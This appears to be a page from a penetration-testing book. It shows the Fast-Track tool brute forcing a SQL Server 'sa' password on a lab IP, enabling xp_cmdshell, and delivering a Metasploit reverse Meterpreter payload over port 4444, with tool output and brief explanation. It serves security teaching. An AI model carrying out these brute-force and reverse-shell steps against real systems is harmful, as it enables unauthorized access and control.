background image

Fast-Track

171

Brute forcing password of Sqlserver on IP 10.211.55.128:1433
Brute forcing password of SqlServer on IP 10.211.55.128:1433
Brute forcing password of Password1 on IP 10.211.55.128:1433

. . . SNIP . . .

*******************************************
The following SQL Servers were compromised:
*******************************************

1. 10.211.55.128:1433 *** U/N: sa P/W: password ***

*******************************************

To interact with system, enter the SQL Server number.

Example: 1. 192.168.1.32 you would type 1

Enter the number:  

After selecting Attempt SQL Ping and Auto Quick Brute Force at  , you 

will be prompted for a SQL database username  , followed by the range of 
IP addresses you want to scan at  . Answer 

yes

 when asked whether you want 

to perform advanced server identification  . Although slow, this can be very 
effective.

The preceding output shows that Fast-Track successfully brute forced a 

system with the username of 

sa

 and password 

password

. At this point, you can 

select the payload and compromise the system, as shown here.

Enter number here: 

1

Enabling: XP_Cmdshell...
Finished trying to re-enable xp_cmdshell stored procedure if disabled.

Configuration file not detected, running default path.
Recommend running setup.py install to configure Fast-Track.
Setting default directory...
What port do you want the payload to connect to you on: 

4444

Metasploit Reverse Meterpreter Upload Detected..
Launching Meterpreter Handler.
Creating Metasploit Reverse Meterpreter Payload..
Sending payload: c88f3f9ac4bbe0e66da147e0f96efd48dad6
Sending payload: ac8cbc47714aaeed2672d69e251cee3dfbad
Metasploit payload delivered..
Converting our payload to binary, this may take a few...
Cleaning up...
Launching payload, this could take up to a minute...
When finished, close the metasploit handler window to return to other 
compromised SQL Servers.
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...